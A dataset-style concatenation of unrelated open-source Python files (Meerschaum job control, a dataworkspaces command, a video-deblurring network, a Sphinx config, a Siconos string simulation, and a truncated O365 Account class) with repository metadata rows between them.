def _start_api(action : Optional[List[str]] = None, **kw):
    """
    Start the API server.
    Usage:
        `start api {options}`
    Options:
        - `-p, --port {number}`
            Port to bind the API server to.
        - `-w, --workers {number}`
            How many worker threads to run.
            Defaults to the number of CPU cores or 1 on Android.
    """
    from meerschaum.actions import actions
    # Delegate to the `api` action with the 'start' subcommand.
    return actions['api'](action=['start'], **kw)
def _start_jobs(
    action : Optional[List[str]] = None,
    name : Optional[str] = None,
    **kw
) -> SuccessTuple:
    """
    Run a Meerschaum action as a background job.
    To create a new job, pass the command arguments after `start job`.
    To start a stopped job, pass the job name after `start job`.
    You may also run a background job with the `-d` or `--daemon` flags.
    Examples:
        Create new jobs:
          - `start job sync pipes --loop`
                Run the action `sync pipes --loop` as a background job.
                Generates a random name; e.g. 'happy_seal'.
          - `start api --daemon --name api_server`
                Run the action `start api` as a background job, and assign the job
                the name 'api_server'.
        Start stopped jobs:
          - `start job happy_seal`
                Start the job 'happy_seal'.
          - `start job --name happy_seal`
                Start the job 'happy_seal' but via the `--name` flag.
                This only applies when no text follows the words 'start job'.
    """
    import textwrap
    from meerschaum.utils.warnings import warn, info
    from meerschaum.utils.daemon import (
        daemon_action, Daemon, get_daemon_ids, get_daemons, get_filtered_daemons,
        get_stopped_daemons, get_running_daemons
    )
    from meerschaum.utils.daemon._names import get_new_daemon_name
    from meerschaum.actions.arguments._parse_arguments import parse_arguments
    from meerschaum.actions import actions
    from meerschaum.utils.prompt import yes_no
    from meerschaum.utils.formatting import print_tuple
    from meerschaum.utils.formatting._jobs import pprint_job, pprint_jobs
    from meerschaum.utils.formatting._shell import clear_screen
    from meerschaum.utils.misc import items_str
    names = []
    daemon_ids = get_daemon_ids()

    new_job = len(list(action)) > 0
    _potential_jobs = {'known' : [], 'unknown' : []}

    if action:
        ### Sort the positional arguments into existing jobs and everything else.
        for a in action:
            _potential_jobs[('known' if a in daemon_ids else 'unknown')].append(a)

        ### Check if the job is named after an action.
        if (
            _potential_jobs['known']
            and _potential_jobs['unknown']
            and _potential_jobs['known'][0] == action[0]
            and _potential_jobs['known'][0] in actions
        ):
            _potential_jobs['unknown'].insert(0, _potential_jobs['known'][0])
            del _potential_jobs['known'][0]

        ### Only spawn a new job if we don't find any existing jobs.
        new_job = (len(_potential_jobs['known']) == 0)

        if not new_job and _potential_jobs['unknown']:
            if not kw.get('nopretty', False):
                warn(
                    (
                        "Unknown job" + ("s" if len(_potential_jobs['unknown']) > 1 else '') + " "
                        + items_str(_potential_jobs['unknown'])
                        + " will be ignored."
                    ),
                    stack = False
                )

        ### Determine the `names` list.
        if new_job:
            names = [(get_new_daemon_name() if not name else name)]
        elif not new_job and not name:
            names = _potential_jobs['known']
        ### Cannot find daemon_id.
        else:
            msg = (
                "Unknown job" + ('s' if len(action) != 1 else '') + ' '
                + items_str(action, and_str='or') + '.'
            )
            return False, msg

    ### No action provided but a --name was. Start job if possible.
    ### E.g. `start job --myjob`
    elif name is not None:
        new_job = False
        names = [name]

    ### No action or --name was provided. Ask to start all stopped jobs.
    else:
        _stopped_daemons = get_stopped_daemons()
        if not _stopped_daemons:
            return False, "No jobs to start."
        names = [d.daemon_id for d in _stopped_daemons]

    def _run_new_job(name : Optional[str] = None):
        """Spawn a brand-new daemon running `action` under `name`."""
        kw['action'] = action
        if not name:
            name = get_new_daemon_name()
        kw['name'] = name
        _action_success_tuple = daemon_action(daemon_id=name, **kw)
        return _action_success_tuple, name

    def _run_existing_job(name : Optional[str] = None):
        """Restart a stopped daemon by replaying its original arguments."""
        daemon = Daemon(daemon_id=name)
        if not daemon.path.exists():
            if not kw.get('nopretty', False):
                warn(f"There isn't a job with the name '{name}'.", stack=False)
                print(
                    f"You can start a new job named '{name}' with `start job "
                    + "{options}" + f" --name {name}`"
                )
            return (False, f"Job '{name}' does not exist."), daemon.daemon_id
        daemon.cleanup()
        try:
            _daemon_sysargs = daemon.properties['target']['args'][0]
        except KeyError:
            ### BUGFIX: previously returned a bare 2-tuple (and a non-f-string
            ### with a 'dameon' typo), which made the caller's
            ### `success_tuple[0]` raise TypeError on a bool.
            return (
                (False, f"Failed to get arguments for daemon '{daemon.daemon_id}'."),
                daemon.daemon_id,
            )
        _daemon_kw = parse_arguments(_daemon_sysargs)
        _daemon_kw['name'] = daemon.daemon_id
        _action_success_tuple = daemon_action(
            **_daemon_kw
        )
        if not _action_success_tuple[0]:
            return _action_success_tuple, daemon.daemon_id
        return (True, "Success"), daemon.daemon_id

    if not names:
        return False, "No jobs to start."

    ### Get user permission to clear logs.
    _filtered_daemons = get_filtered_daemons(names)
    if not kw.get('force', False) and _filtered_daemons:
        _filtered_running_daemons = get_running_daemons(_filtered_daemons)
        if _filtered_running_daemons:
            pprint_jobs(_filtered_running_daemons)
            if yes_no(
                "The above jobs are still running. Do you want to first stop these jobs?",
                default = 'n',
                yes = kw.get('yes', False),
                noask = kw.get('noask', False)
            ):
                stop_success_tuple = actions['stop'](
                    action = ['jobs'] + [d.daemon_id for d in _filtered_running_daemons],
                    force = True,
                )
                if not stop_success_tuple[0]:
                    warn(
                        "Failed to stop job" + ("s" if len(_filtered_running_daemons) != 1 else '')
                        + items_str([d.daemon_id for d in _filtered_running_daemons])
                        + ".",
                        stack = False
                    )
                    for d in _filtered_running_daemons:
                        names.remove(d.daemon_id)
                        _filtered_daemons.remove(d)
            else:
                info(
                    "Skipping already running job"
                    + ("s" if len(_filtered_running_daemons) != 1 else '') + ' '
                    + items_str([d.daemon_id for d in _filtered_running_daemons]) + '.'
                )
                for d in _filtered_running_daemons:
                    names.remove(d.daemon_id)
                    _filtered_daemons.remove(d)

        if not _filtered_daemons:
            return False, "No jobs to start."
        pprint_jobs(_filtered_daemons, nopretty=kw.get('nopretty', False))
        if not yes_no(
            (
                f"Would you like to overwrite the logs and run the job"
                + ("s" if len(names) != 1 else '') + " " + items_str(names) + "?"
            ),
            default = 'n',
            yes = kw.get('yes', False),
            nopretty = kw.get('nopretty', False),
            noask = kw.get('noask', False),
        ):
            return (False, "Nothing was started.")

    _successes, _failures = [], []
    for _name in names:
        success_tuple, __name = _run_new_job(_name) if new_job else _run_existing_job(_name)
        if success_tuple[0]:
            if kw.get('nopretty', False):
                print_tuple(True, f"Successfully started job '{__name}'.")
            _successes.append(_name)
        else:
            _failures.append(_name)

    msg = (
        (("Successfully started job" + ("s" if len(_successes) != 1 else '')
            + f" {items_str(_successes)}." + ('\n' if _failures else ''))
            if _successes else '')
        + ("Failed to start job" + ("s" if len(_failures) != 1 else '')
            + f" {items_str(_failures)}." if _failures else '')
    )
    return len(_successes) > 0, msg
def _complete_start_jobs(
    action: Optional[List[str]] = None,
    line: str = '',
    **kw
) -> List[str]:
    """
    Tab-completion helper for `start jobs`: return the daemon IDs that can
    complete the token currently being typed.

    :param action: arguments already parsed for the action
        (daemon IDs selected so far).
    :param line: the raw input line; only its last token matters.
    :return: candidate daemon IDs for completion.
    """
    from meerschaum.utils.daemon import get_daemon_ids
    daemon_ids = get_daemon_ids()
    if not action:
        return daemon_ids

    ### The token currently being typed (empty when the line ends in a space).
    last_token = line.split(' ')[-1]

    ### Skip IDs already chosen; offer every remaining ID on an empty token,
    ### otherwise only IDs matching the partial token.
    return [
        daemon_id
        for daemon_id in daemon_ids
        if daemon_id not in action
        and (last_token == '' or daemon_id.startswith(action[-1]))
    ]
### NOTE: This must be the final statement of the module.
### Any subactions added below these lines will not
### be added to the `help` docstring.
from meerschaum.utils.misc import choices_docstring as _choices_docstring
### Append the auto-generated list of `start` choices to the action docstring.
start.__doc__ += _choices_docstring('start')
| 35.178125 | 99 | 0.561784 |
4ef6d9de4681ea32e4bdb6c04f2857d368edf988 | 1,260 | py | Python | dataworkspaces/commands/add.py | jfischer/data-workspaces-python | 5787fb2488d9dc407b6193a38d71aed955d7158c | [
"Apache-2.0"
] | 6 | 2019-04-16T10:44:41.000Z | 2021-02-24T09:34:10.000Z | dataworkspaces/commands/add.py | jfischer/data-workspaces-python | 5787fb2488d9dc407b6193a38d71aed955d7158c | [
"Apache-2.0"
] | 67 | 2019-03-08T13:32:31.000Z | 2022-03-09T15:15:41.000Z | dataworkspaces/commands/add.py | jfischer/data-workspaces-python | 5787fb2488d9dc407b6193a38d71aed955d7158c | [
"Apache-2.0"
] | 2 | 2020-04-24T02:48:56.000Z | 2022-01-14T01:07:48.000Z | # Copyright 2018,2019 by MPI-SWS and Data-ken Research. Licensed under Apache 2.0. See LICENSE.txt.
import click
from dataworkspaces.errors import ConfigurationError
from dataworkspaces.workspace import Workspace
def add_command(scheme: str, role: str, name: str, workspace: Workspace, *args):
    """Add a new resource to the workspace and save the workspace.

    :param scheme: resource scheme identifier
    :param role: role the resource plays in the workspace
    :param name: short unique name for the resource, or None to derive one
    :param workspace: workspace the resource is added to
    :param args: extra, scheme-specific arguments
    :raises ConfigurationError: in batch mode, when the requested name
        is already taken.
    """
    current_names = set(workspace.get_resource_names())
    if workspace.batch:
        # Batch (non-interactive) mode: derive a name when none was given,
        # and fail hard on a collision instead of prompting.
        if name is None:
            name = workspace.suggest_resource_name(scheme, role, *args)
        else:
            if name in current_names:
                raise ConfigurationError("Resource name '%s' already in use" % name)
    else:
        # Interactive mode: keep prompting until a unique name is entered,
        # offering a generated suggestion as the default answer.
        suggested_name = None
        while (name is None) or (name in current_names):
            if suggested_name is None:
                suggested_name = workspace.suggest_resource_name(scheme, role, *args)
            name = click.prompt(
                "Please enter a short, unique name for this resource", default=suggested_name
            )
            if name in current_names:
                click.echo("Resource name '%s' already in use." % name, err=True)
    workspace.add_resource(name, scheme, role, *args)
    workspace.save("add of %s" % name)
    click.echo("Successfully added resource '%s' to workspace." % name)
| 39.375 | 99 | 0.651587 |
8573f739eb3c5ae02c4ec68682b029320e9b189e | 2,261 | py | Python | simdeblur/model/backbone/dblrnet/dblrnet.py | ljzycmd/SimDeblur | dd2f60c41176b75c4eaf80d740f547c206aa8227 | [
"MIT"
] | 190 | 2021-03-22T13:59:42.000Z | 2022-03-08T21:14:41.000Z | simdeblur/model/backbone/dblrnet/dblrnet.py | Wang-jiahao/SimDeblur | 31d88e1fbec91d5cc9062f4a46538e4ba806ab29 | [
"MIT"
] | 9 | 2021-04-26T06:44:40.000Z | 2022-03-25T07:48:30.000Z | simdeblur/model/backbone/dblrnet/dblrnet.py | Wang-jiahao/SimDeblur | 31d88e1fbec91d5cc9062f4a46538e4ba806ab29 | [
"MIT"
] | 27 | 2021-03-23T03:11:00.000Z | 2022-03-19T21:26:02.000Z | """
Adversarial Spatio-Temporal Learning for Video Deblurring
The DBLRNet adopts 3D convolution for spatio-temporal modeling, which serves as a generator for adversarial training.
"""
import torch
import torch.nn as nn
from ...build import BACKBONE_REGISTRY
@BACKBONE_REGISTRY.register()
class DBLRNet(nn.Module):
    """DBLRNet generator for video deblurring ("Adversarial Spatio-Temporal
    Learning for Video Deblurring").

    The input clip is processed by two 3D convolutions without temporal
    padding, then the temporal/channel axes are flattened and refined by a
    stack of 2D residual blocks, and finally mapped to a 3-channel image.

    NOTE(review): `Ln` and `L_out` are built for `inner_channels` input
    channels, while the flattened features carry
    inner_channels * (num_frames - 4) channels (each unpadded depth-3 conv
    shrinks the temporal axis by 2). The shapes only line up when
    num_frames == 5 -- TODO confirm the intended frame count.
    """

    def __init__(self, num_frames, in_channels, inner_channels):
        """
        :param num_frames: number of input frames per sample
        :param in_channels: channels of each input frame (e.g. 3 for RGB)
        :param inner_channels: feature width of the residual trunk
        """
        super(DBLRNet, self).__init__()
        self.num_frames = num_frames
        self.in_channels = in_channels
        self.inner_channels = inner_channels
        # number of stacked 2D residual blocks in the trunk
        self.layer_counts = 15

        # Spatio-temporal stem: padding=(0, 1, 1) keeps the spatial size but
        # shrinks the temporal axis by 2 per convolution.
        self.L_in = nn.Sequential(
            nn.Conv3d(self.in_channels, 16, kernel_size=(3, 3, 3), stride=(1, 1, 1), padding=(0, 1, 1)),
            nn.ReLU(inplace=True),
            nn.Conv3d(16, self.inner_channels, kernel_size=(3,3,3), stride=(1, 1, 1), padding=(0, 1, 1)),
            nn.ReLU(inplace=True)
        )

        # 2D residual trunk.
        Ln = []
        for i in range(self.layer_counts):
            Ln.append(
                ResBlock(self.inner_channels)
            )
        self.Ln = nn.Sequential(
            *Ln
        )

        # Reconstruction head producing the 3-channel output image.
        self.L_out = nn.Sequential(
            nn.Conv2d(self.inner_channels, self.inner_channels * 4, 3, 1, 1),
            nn.ReLU(),
            nn.Conv2d(self.inner_channels * 4, self.inner_channels * 4, 3, 1, 1),
            nn.ReLU(),
            nn.Conv2d(self.inner_channels * 4, 3, 3, 1, 1)
        )

    def forward(self, x):
        """
        :param x: input clip, shape (batch, num_frames, channels, h, w)
        :return: 3-channel output image, shape (batch, 3, h, w)
        """
        assert x.dim() == 5, "Input tensor should be in 5 dims!"
        b, n, c, h, w = x.shape
        # Conv3d expects (batch, channels, depth, h, w).
        x = x.transpose(1, 2)
        l2 = self.L_in(x)
        # Flatten (channels, depth) into one channel axis for the 2D trunk.
        ln = self.Ln(l2.view(b, -1, h, w))
        # Global residual connection around the trunk.
        out = self.L_out(ln + l2.view(b, -1, h, w))
        return out
class ResBlock(nn.Module):
    """Residual block: conv-BN-ReLU-conv-BN plus an identity skip connection."""

    def __init__(self, in_channels):
        """
        :param in_channels: number of input (and output) feature channels
        """
        super().__init__()
        self.in_channels = in_channels
        channels = in_channels
        # Two 3x3 convolutions with batch norm; the trailing BN has no ReLU
        # so the skip addition happens on the pre-activation output.
        layers = [
            nn.Conv2d(channels, channels, 3, 1, 1),
            nn.BatchNorm2d(num_features=channels),
            nn.ReLU(),
            nn.Conv2d(channels, channels, 3, 1, 1),
            nn.BatchNorm2d(num_features=channels),
        ]
        self.convs = nn.Sequential(*layers)

    def forward(self, x):
        """Apply the convolutional branch and add the identity shortcut."""
        shortcut = x
        out = self.convs(x)
        return out + shortcut
77654e12fc54fee139299f96319413aa82c8a133 | 7,778 | py | Python | docs/conf.py | lucasb-eyer/highlight.js | a5f137457daa01677e475379f5d9ead184bcf3c4 | [
"BSD-3-Clause"
] | null | null | null | docs/conf.py | lucasb-eyer/highlight.js | a5f137457daa01677e475379f5d9ead184bcf3c4 | [
"BSD-3-Clause"
] | null | null | null | docs/conf.py | lucasb-eyer/highlight.js | a5f137457daa01677e475379f5d9ead184bcf3c4 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
#
# highlight.js documentation build configuration file, created by
# sphinx-quickstart on Wed Sep 12 23:48:27 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# PEP 8: one import per statement.
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'highlight.js'
copyright = u'2012–2015, Ivan Sagalaev'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '9.2'
# The full version, including alpha/beta/rc tags.
release = '9.2.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'highlightjsdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'highlightjs.tex', u'highlight.js Documentation',
u'Ivan Sagalaev', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'highlightjs', u'highlight.js Documentation',
[u'Ivan Sagalaev'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'highlightjs', u'highlight.js Documentation',
u'Ivan Sagalaev', 'highlightjs', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
| 32.00823 | 80 | 0.714965 |
4e2f593adcc98c2355d46b879b5dfc2f15ae328d | 4,740 | py | Python | examples/Mechanics/Music/run.py | bremond/siconos | 8deea56ff6779379f4f69e0376d24a81562a42d4 | [
"Apache-2.0"
] | null | null | null | examples/Mechanics/Music/run.py | bremond/siconos | 8deea56ff6779379f4f69e0376d24a81562a42d4 | [
"Apache-2.0"
] | null | null | null | examples/Mechanics/Music/run.py | bremond/siconos | 8deea56ff6779379f4f69e0376d24a81562a42d4 | [
"Apache-2.0"
] | null | null | null | """Implementation of vibrating string model, described
in JSV paper (Issanchou 2017) and using Siconos for contact
simulation.
"""
from guitar import StringDS, Fret, Guitar
#import siconos.kernel as sk
import time
import numpy as np
import scipy.io
import sys,os
visu=False
if visu:
import matplotlib.pyplot as plt
# ======== Description of the string(s) ==========
# -- Geometry and material --
G_string = {
'length': 0.863,
'diameter': 0.43e-3,
'density': 6.69e-3,
'B': 3.5e-5,
'tension': 191.6,
}
# A dictionnary with parameters required to compute quality factor
damping_parameters = {
'nu_air': 1.8e-5,
'rho_air': 1.2,
'delta_ve': 0.01,
'1/qte': 6e-6}
# -- Spatial discretisation (modal proj) and initial conditions --
number_of_modes = 864
# position (index) of the max value of initial state
# --> middle of the string
#imiddle = int((number_of_modes + 2) / 2)
# -- The dynamical system(s) --
# Warning: 'real dofs' numbers start from 0 to number_of_modes + 1
# but DS size is number_of_modes, boundary points are ignored.
guitar_string = StringDS(number_of_modes, geometry_and_material=G_string,
damping_parameters=damping_parameters,
max_coords=(7.8e-3, .64))
# -- The interaction(s) between strings and frets --
# One Interaction is needed for each contact point.
frets_file = './donnees_siconos/pb2_h.mat'
frets_positions = scipy.io.loadmat(frets_file)['h'][:600, 0]
nb_frets = frets_positions.size
dx = guitar_string.space_step
frets_indices = np.arange(1, nb_frets + 1)
#array(np.round(frets_positions / dx), np.int32)
#frets_y = np.linspace(-0.5e-4, -1e-4, 20)
frets = []
interactions = {}
for i in range(nb_frets):
frets.append(Fret(guitar_string,
contact_positions=(frets_indices[i],
frets_positions[i]),
restitution_coeff=0.))
interactions[frets[-1]] = guitar_string
# contact at a point close to left boundary.
# guitar_fret_left = Fret(guitar_string, contact_positions=(3, -1.e-4),
# restitution_coeff=0.9)
# -- Model and simulaton --
# sample freq and time-discretisation
# if freq is set as input arg ...
if len(sys.argv) > 1:
fe = float(sys.argv[1])
else:
fe = 1960
initial_time = 0.
final_time = 0.3
final_time = 3.00
guitar_model = Guitar(interactions,
#{guitar_fret_middle: guitar_string,
# guitar_fret_left: guitar_string
# },
[initial_time, final_time],
fe)
simu = guitar_model.simu
# sk.TimeStepping(time_discr, osi, osnspb)
# # -- Model setup with dynamics, interaction and simulation --
# -- Save inital state --
# Note about savings:
# For each iteration k, we need :
# - the current time value, saved in guitar_model.time[k]
# - data for ds (positions, velocities ...):
# use save_ds_state(k, ds) for each required ds
# - data for interactions (impulsion at impact, distance ...)
# use save_interaction_state(k, interaction)
guitar_model.time[0] = initial_time
guitar_model.save_ds_state(0, guitar_string)
for i in range(len(frets)):
guitar_model.save_interaction_state(0, frets[i])
k = 1
# -- Time loop: advance the nonsmooth simulation and record each step --
print("Start simulation ...")
# time.clock() was removed in Python 3.8; perf_counter() is the recommended
# monotonic replacement for measuring elapsed wall time.
start_time = time.perf_counter()
while simu.hasNextEvent():
    if k % 100 == 0:
        print('step = ', k, '---- time = ',
              simu.nextTime(),
              '------------------------')
    simu.computeOneStep()
    # Save current time, dynamical-system state and interaction data
    # for post-processing (see the save_* notes above).
    guitar_model.time[k] = simu.nextTime()
    guitar_model.save_ds_state(k, guitar_string)
    for fret in frets:
        guitar_model.save_interaction_state(k, fret)
    k += 1
    simu.nextStep()
print('End of simulation process. Duration: ', time.perf_counter() - start_time)
# -- Save results for ds in numpy file +--
result_dir = 'results'
if not os.path.exists(result_dir):
    os.mkdir(result_dir)
# File names encode the modal truncation (number_of_modes) and the
# sampling frequency (fe) so different runs do not overwrite each other.
output = guitar_model.data_ds[guitar_string]
filename = os.path.join(result_dir,'data_ds_'+str(number_of_modes)+'_'+str(fe))
np.save(filename, output)

# -- Save results for interaction in numpy file --
# One file per fret/contact point, indexed by its position in `frets`.
for i in range(len(frets)):
    output = guitar_model.data_interactions[frets[i]]
    filename = os.path.join(result_dir,'data_interactions_'+str(i)+'_'+str(number_of_modes)+'_'+str(fe))
    np.save(filename, output)

# to plot results, call:
#guitar_model.plot_ds_state(some_ds, indices, fig_number)
# --> plot some_ds attributes (position/time ...)
#guitar_model.plot_interaction(some_interaction, fig_number)
# --> plot data relative to some_interaction
# guitar_model.plot_mode(some_ds, filename)
# --> create animation for some_ds mode
#guitar_model.plot_ds_state(guitar_string)
194f7921374d383bb2e10c07822f7a203dcc1f2c | 7,060 | py | Python | O365/account.py | llange/python-o365 | 11c7e81c27c082a1169cce21ea7d3f45e4a5d47b | [
"Apache-2.0"
] | null | null | null | O365/account.py | llange/python-o365 | 11c7e81c27c082a1169cce21ea7d3f45e4a5d47b | [
"Apache-2.0"
] | null | null | null | O365/account.py | llange/python-o365 | 11c7e81c27c082a1169cce21ea7d3f45e4a5d47b | [
"Apache-2.0"
] | null | null | null | from .address_book import AddressBook, GlobalAddressList
from .calendar import Schedule
from .connection import Connection, Protocol, MSGraphProtocol
from .connection import oauth_authentication_flow
from .drive import Storage
from .mailbox import MailBox
from .message import Message
from .sharepoint import Sharepoint
from .planner import Planner
from .utils import ME_RESOURCE
class Account(object):
    """Entry point for working with an Office 365 / Microsoft Graph account.

    Ties a :class:`Connection` (credentials, tokens, requests) to a
    :class:`Protocol` and exposes factory methods returning helpers for the
    individual services (mailbox, address book, calendar, storage,
    sharepoint, planner).
    """

    def __init__(self, credentials, *, protocol=None, main_resource=ME_RESOURCE,
                 **kwargs):
        """ Creates an object which is used to access resources related to the
        specified credentials

        :param tuple credentials: a tuple containing the client_id
         and client_secret
        :param Protocol protocol: the protocol to be used in this account
        :param str main_resource: the resource to be used by this account
         ('me' or 'users')
        :param kwargs: any extra args to be passed to the Connection instance
        :raises ValueError: if an invalid protocol is passed
        """
        protocol = protocol or MSGraphProtocol  # Defaults to Graph protocol
        # `protocol` may be given either as a class (instantiated here with
        # the account's resource) or as an already-built Protocol instance.
        self.protocol = protocol(default_resource=main_resource,
                                 **kwargs) if isinstance(protocol,
                                                         type) else protocol

        if not isinstance(self.protocol, Protocol):
            raise ValueError("'protocol' must be a subclass of Protocol")

        self.con = Connection(credentials, **kwargs)
        self.main_resource = main_resource

    def __repr__(self):
        if self.con.auth:
            return 'Account Client Id: {}'.format(self.con.auth[0])
        else:
            return 'Unidentified Account'

    @property
    def is_authenticated(self):
        """
        Checks whether the library has the authentication and that is not expired
        :return: True if authenticated, False otherwise
        """
        token = self.con.token_backend.token
        if not token:
            token = self.con.token_backend.get_token()

        # NOTE: no refresh is attempted here; an expired token simply
        # reports as "not authenticated".
        return token is not None and not token.is_expired

    def authenticate(self, *, scopes, **kwargs):
        """ Performs the oauth authentication flow resulting in a stored token
        It uses the credentials passed on instantiation

        :param list[str] scopes: list of protocol user scopes to be converted
         by the protocol or scope helpers
        :param kwargs: other configurations to be passed to the
         Connection instance
        :return: Success / Failure
        :rtype: bool
        """
        # Reuse this account's token backend unless the caller overrides it.
        kwargs.setdefault('token_backend', self.con.token_backend)
        return oauth_authentication_flow(*self.con.auth, scopes=scopes,
                                         protocol=self.protocol, **kwargs)

    @property
    def connection(self):
        """ Alias for self.con

        :rtype: Connection
        """
        return self.con

    def new_message(self, resource=None):
        """ Creates a new message to be sent or stored

        :param str resource: Custom resource to be used in this message
         (Defaults to parent main_resource)
        :return: New empty message
        :rtype: Message
        """
        return Message(parent=self, main_resource=resource, is_draft=True)

    def mailbox(self, resource=None):
        """ Get an instance to the mailbox for the specified account resource

        :param str resource: Custom resource to be used in this mailbox
         (Defaults to parent main_resource)
        :return: a representation of account mailbox
        :rtype: MailBox
        """
        return MailBox(parent=self, main_resource=resource, name='MailBox')

    def address_book(self, *, resource=None, address_book='personal'):
        """ Get an instance to the specified address book for the
        specified account resource

        :param str resource: Custom resource to be used in this address book
         (Defaults to parent main_resource)
        :param str address_book: Choose from 'Personal' or
         'GAL' (Global Address List)
        :return: a representation of the specified address book
        :rtype: AddressBook or GlobalAddressList
        :raises RuntimeError: if invalid address_book is specified
        """
        # Case-insensitive selection between the user's own contacts and
        # the organisation-wide Global Address List.
        if address_book.lower() == 'personal':
            return AddressBook(parent=self, main_resource=resource,
                               name='Personal Address Book')
        elif address_book.lower() == 'gal':
            return GlobalAddressList(parent=self)
        else:
            raise RuntimeError(
                'address_book must be either "personal" '
                '(resource address book) or "gal" (Global Address List)')

    def schedule(self, *, resource=None):
        """ Get an instance to work with calendar events for the
        specified account resource

        :param str resource: Custom resource to be used in this schedule object
         (Defaults to parent main_resource)
        :return: a representation of calendar events
        :rtype: Schedule
        """
        return Schedule(parent=self, main_resource=resource)

    def storage(self, *, resource=None):
        """ Get an instance to handle file storage (OneDrive / Sharepoint)
        for the specified account resource

        :param str resource: Custom resource to be used in this drive object
         (Defaults to parent main_resource)
        :return: a representation of OneDrive File Storage
        :rtype: Storage
        :raises RuntimeError: if protocol doesn't support the feature
        """
        if not isinstance(self.protocol, MSGraphProtocol):
            # TODO: Custom protocol accessing OneDrive/Sharepoint Api fails here
            raise RuntimeError(
                'Drive options only works on Microsoft Graph API')

        return Storage(parent=self, main_resource=resource)

    def sharepoint(self, *, resource=''):
        """ Get an instance to read information from Sharepoint sites for the
        specified account resource

        :param str resource: Custom resource to be used in this sharepoint
         object (Defaults to parent main_resource)
        :return: a representation of Sharepoint Sites
        :rtype: Sharepoint
        :raises RuntimeError: if protocol doesn't support the feature
        """
        if not isinstance(self.protocol, MSGraphProtocol):
            # TODO: Custom protocol accessing OneDrive/Sharepoint Api fails here
